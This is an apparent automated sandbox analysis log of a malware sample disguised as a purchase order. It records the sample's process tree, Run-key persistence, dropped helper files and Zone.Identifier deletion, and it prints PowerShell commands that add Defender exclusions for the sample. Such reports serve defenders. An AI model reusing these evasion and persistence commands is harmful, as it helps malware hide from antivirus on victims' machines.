                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: 08042021New-PurchaseOrder.exeReversingLabs: Detection: 14%
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe:Zone.Identifier
                      Source: unknownProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe'
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdbZ source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32# source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jVisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Configuration.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb-Q source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: O.pdb4( source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb5t source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp
                      Source: Binary string: System.Drawing.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Drawing.pdb9 source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: ww08042021New-PurchaseOrder.PDB source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32 source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdbD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Windows.Forms.pdb04lk source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: 08042021New-PurchaseOrder.exe Static PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0040289F
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040B550 push eax; ret 5_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040B550 push eax; ret 5_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040B50D push ecx; ret 5_2_0040B51D
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 6_2_0040B550 push eax; ret 6_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 6_2_0040B550 push eax; ret 6_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 6_2_0040B50D push ecx; ret 6_2_0040B51D
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe File created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe File created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_00401306
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SWqTT

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File opened: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00408E31
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
